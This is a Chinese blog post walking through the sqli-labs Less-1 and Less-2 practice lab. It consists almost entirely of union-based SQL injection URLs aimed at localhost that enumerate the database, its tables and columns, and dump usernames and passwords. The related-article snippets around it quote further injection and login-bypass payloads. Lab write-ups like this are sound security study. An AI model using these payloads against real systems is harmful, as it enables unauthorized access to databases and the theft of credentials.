Sqli-labs

已于 2022-09-20 20:47:08 修改
阅读量216 收藏
点赞数
分类专栏: Web渗透测试 文章标签: sql 渗透测试
于 2020-12-31 23:03:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44932745/article/details/112056531
版权

sqli-labs

Less-1

1.寻找注入点

http://127.0.0.1/sqli/Less-1/?id=1'     //报错
http://127.0.0.1/sqli/Less-1/?id=1' and 1=1 --+     //正常
http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 --+     //报错
http://127.0.0.1/sqli/Less-1/?id=1' order by 4 --+  //报错,所以字段数是3
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 --+     //2,3有回显

2.爆数据库

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),user() --+

3.爆数据表

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' --+

4.爆字段

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

5.爆数据

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(id,username,password) from users --+

Less-2

1.寻找注入点

http://127.0.0.1/sqli/Less-2/?id=1'         //报错
http://127.0.0.1/sqli/Less-2/?id=1 and 1=1  //正常
http://127.0.0.1/sqli/Less-2/?id=1 and 1=2  //报错
http://127.0.0.1/sqli/Less-2/?id=1 order by 4   //报错,字段数为3
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3

2.爆库

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,database()

3.爆表

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

4.爆字段

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'

5.爆数据

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(id,username,password,0x10) from users

半世尘笑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs大详解(完结)
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
SQL-Labs从搭建到闯关(SQL注入天书)
Kevin's Blog
02-22 4666
一、介绍   sql-labs是一个学习sql注入的平台 二、环境搭建 GitHub项目地址:https://github.com/Audi-1/sqli-labs 》》启动phpstudy 》》将sql-labs解压到站点目录 》》进入到sqli-labs靶机站点,点击重置数据库即可在mysql中创建了数据库 》》进入到关卡1 三、注入类型 3.1 Less-1 字符型注入,基于错误的GET单引号 3.1.1 判断是否存在注入点 》》输入?id=1 显示出了数据库中第一行的数据 》》输入单引号
sql-labs(1-8关)
2302_80935968的博客
04-17 1164
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=100 --+表示所有字段对应的表名。
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 3503
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
sqli-labs靶场安装
剁椒鱼头没剁椒的博客
10-22 6684
PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。Sqlilabs是一个学习sql注入的平台,GET和POST场景包括了许多基本的实验内容,例如:基于错误的注入、盲注、更新查询注入、插入查询注入、Header注入、二次注入、Bypass WAF、堆叠注入等等。
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6477
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs.rar
12-22
SQL注入练习平台搭建,需要PHPstudy等对应的工具配合使用,很适合小白练习,收悉SQL的注入由浅入深 东西是好东西网上也有,后期会出教程。
sql-labs 详解
m0_52314120的博客
03-28 1905
文章目录前言一、第一关1.and 1=2测试 :2.尝试闭合:3.尝试将 ‘ 注释4.利用order by函数爆字段数5.设置错误的id值使其通过报错带出查询结果6.判断回显点7.查询当前库名与用户8.联合查询爆库名9.爆表名10.查询user下的列名11.从username和password中得到账号密码二、第二关总结 前言 sql-labs的注入样例 若有不足请留言指正 一、第一关 1.and 1=2测试 : http://127.0.0.1/sql/Less-1/?id=1 2.尝试闭合: 127
sqllabs详解与知识点汇总(内含代码审计)
Samblue_M的博客
02-03 4979
sqllabs闯关记录 关于注释符的详解 SQL注入注释符(#、-- 、/**/)使用条件及其他注释方式的探索 - impulse- - 博客园 (cnblogs.com) HTTP请求方法------GET 对比 POST HTTP 方法:GET 对比 POST | 菜鸟教程 (runoob.com) 来自知乎的绕过 SQL注入:各种绕过检测的姿势 - 知乎 (zhihu.com) Less-1~4 @读题-------------get方式提交 @Error based—报错注入 @Single quo
Sql-labs 第一关超详细讲解
A9874564的博客
02-21 6019
一.Sql注入含义 所谓的sql注入就是通过某种方式将恶意的sql代码添加到输入参数中,然后传递到sql服务器使其解析并执行的一种攻击手法。 二.注入思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三.判断是否存在注入点 ...
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 8295
sql注入集合
sql-labs通关
热门推荐
whisper921的博客
03-05 1万+
less 1—单引号字符型注入 字符型注入,单引号 通过随机输入id得知用户名和密码,网址后面接?id=1 判断 Sql 注入漏洞的类型:1.数字型 2.字符型 用 and 1=1 和 and 1=2 来判断: 1.Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。 2.Url 地址中继续输入 http://xxx/abc.php?id= x and 1=2 ,页面运行错误,则说明此 Sql 注入为数字型注入。 .
SQL注入 sqli-labs部分解析
ziwenya的博客
08-31 607
sql注入基础操作及相关sqli-labs关卡通关流程
sql-labs学习
weixin_64286326的博客
02-08 2197
前言: 年前学习过sql的知识,现在忘得差不多了,趁这个机会赶紧在复习一下。 1 万能密码 在mysql里面 -- # 他们都代表注释 我们在登陆框内输入账号密码,服务器会在数据库内进行查询,大概是这样 select * FROM user WHERE username= '111' AND password= '222' 假如我们在登录框内的username填写 1' or 1=1# 效果是这样 SELECT * FROM user WHERE username= '1'
sql-labs
m0_74606212的博客
03-10 378
sql-labs
sqli-labs29
最新发布
04-21
sqli-labs是一个用于学习和实践SQL注入的实验平台,它提供了一系列具有不同难度级别的SQL注入漏洞场景。sqli-labs29是其中的一个具体场景,它主要涉及到基于时间的盲注(Blind Time-Based Injection)。 在sqli-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值